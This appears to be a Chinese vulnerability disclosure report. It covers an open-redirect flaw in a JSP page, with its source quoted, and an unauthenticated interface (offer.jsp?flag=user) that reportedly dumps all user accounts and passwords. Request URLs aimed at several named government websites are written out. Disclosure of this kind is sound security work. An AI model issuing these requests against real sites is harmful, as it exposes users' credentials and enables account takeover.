### 简要描述:
可获取所有用户的用户信息(包含密码),另外附送一个跳转的漏洞。
### 详细说明:
获取用户密码的问题主要是产生在接口上的,这接口过于开放了……跳转就没什么可说的了。
先发跳转:
<%
HttpSession sessions = request.getSession();
String url = request.getParameter("url"); //url参数
sessions.setAttribute("loginid1", "");
sessions.setAttribute("username", "");
sessions.setAttribute("loginpass1", "");
response.sendRedirect(url); //跳转
%>
http://management.ysx.gov.cn/jis/check/zx.jsp?url=http://www.baidu.com
自定义url参数即可。
### 漏洞证明:
接口的问题产生在jis/interface/offer.jsp
http://management.ysx.gov.cn/jis/interface/offer.jsp?flag=user
[<img src="https://images.seebug.org/upload/201402/041455563cd2fbeaa17d0cd24de5b38d6cce3211.png" alt="image086.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201402/041455563cd2fbeaa17d0cd24de5b38d6cce3211.png)
所以加上参数flag=user即可导出所有用户的信息了
[<img src="https://images.seebug.org/upload/201402/04145621b257f599914bf77a9364b630afb83911.png" alt="image087.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201402/04145621b257f599914bf77a9364b630afb83911.png)
http://www.yuqing.gov.cn/jis/interface/offer.jsp?flag=user
[<img src="https://images.seebug.org/upload/201402/0414564550a896fd86088b49e459386b3c8a1a33.png" alt="image088.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201402/0414564550a896fd86088b49e459386b3c8a1a33.png)
http://www.haiyan.gov.cn/jis/interface/offer.jsp?flag=user
[<img src="https://images.seebug.org/upload/201402/041457074b3280529c879f5c4262e7a8801ab316.png" alt="image089.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201402/041457074b3280529c879f5c4262e7a8801ab316.png)
http://yqxsz.gov.cn/jis/interface/offer.jsp?flag=user
等
暂无评论